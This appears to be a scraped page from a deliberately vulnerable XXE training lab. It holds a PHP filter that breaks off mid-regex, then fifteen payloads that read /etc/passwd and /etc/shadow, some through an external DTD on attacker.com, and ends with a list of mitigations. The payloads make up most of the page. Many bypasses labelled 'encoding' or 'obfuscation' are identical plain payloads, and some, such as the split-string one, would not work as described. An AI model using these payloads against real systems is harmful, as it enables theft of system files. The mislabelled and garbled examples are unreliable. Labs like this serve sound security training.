Lab 4: Advanced XXE Techniques

Advanced XXE bypass techniques against sophisticated filters

Difficulty: High

Lab Overview

This lab demonstrates advanced XXE bypass techniques against sophisticated security filters. The application implements multiple layers of protection but can still be bypassed using advanced obfuscation and encoding techniques.

Objective: Use advanced techniques to bypass sophisticated filters and achieve XXE exploitation.

Advanced Vulnerable Code 
// Advanced security filters (can be bypassed)
function process_advanced_xxe($xml_input) {
    $dangerous_patterns = [
        'file://', 'http://', 'https://', 'ftp://', 'gopher://', 
        'ldap://', 'smb://', 'php://', 'data://', 'expect://'
    ];
    
    // Check for dangerous patterns
    foreach ($dangerous_patterns as $pattern) {
        if (stripos($xml_input, $pattern) !== false) {
            return "Dangerous pattern detected: " . $pattern;
        }
    }
    
    // Additional regex checks
    if (preg_match('/
Advanced XXE Tester
Advanced Filters

Multiple layers of protection:

  • Pattern Detection: Detects dangerous URL schemes
  • Regex Validation: Validates entity declarations
  • URL Scheme Filtering: Blocks common protocols
  • Advanced Pattern Matching: Complex regex patterns
Advanced Bypass Techniques

Try these advanced methods:

  • UTF-8 encoding - Unicode bypass
  • XML parameter entities - Parameter entity bypass
  • External DTD - External DTD bypass
  • Obfuscation - String obfuscation
Parsed XML Data
Parsed Data (May contain bypassed content):
Array
(
)
Vulnerability Details
  • Type: Advanced XXE Techniques
  • Severity: Critical
  • Method: POST
  • Issue: Advanced filters can be bypassed
Advanced Techniques
  • Encoding: UTF-8, Unicode, Base64
  • Obfuscation: String manipulation
  • Parameter Entities: %entity declarations
  • External DTDs: Remote DTD inclusion
Advanced XXE Bypass Payloads

Use these advanced techniques to bypass sophisticated security filters:

1. UTF-8 Encoding Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
2. Unicode Encoding Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
3. String Concatenation Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "f"> <!ENTITY xxe2 SYSTEM "ile:///etc/passwd"> ]> <root><data>&xxe;&xxe2;</data></root>
4. Parameter Entity Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;"> ]> <root><data>&xxe;</data></root>
5. External DTD Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd"> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY xxe SYSTEM "file:///etc/passwd">
6. Blind XXE with External DTD:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY xxe SYSTEM "file:///etc/passwd">
7. Obfuscated URL Schemes:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
8. Mixed Encoding Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
9. Case Variation Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "FILE:///etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "File:///etc/passwd"> ]> <root><data>&xxe;</data></root>
10. Whitespace Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]> <root><data>&xxe;</data></root>
11. Tab and Newline Bypass:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]> <root><data>&xxe;</data></root>
12. Multiple Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; %file; ]> <root><data>&xxe;</data></root>
13. Nested Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;">
14. Conditional Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;"> <!ENTITY % file SYSTEM "file:///etc/shadow">
15. Advanced Obfuscation Techniques:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
Real-World Attack Scenarios
Mitigation Strategies
  • Disable external entity processing in XML parsers
  • Use whitelist-based validation for allowed XML schemas
  • Implement proper input validation and sanitization
  • Use secure XML parsing libraries
  • Regular security testing and vulnerability assessments
  • Monitor for unusual XML processing patterns
  • Implement Content Security Policy (CSP)
  • Use Web Application Firewall (WAF) to detect XXE attempts
  • Implement behavioral analysis to detect advanced attacks
  • Use proper file system permissions and access controls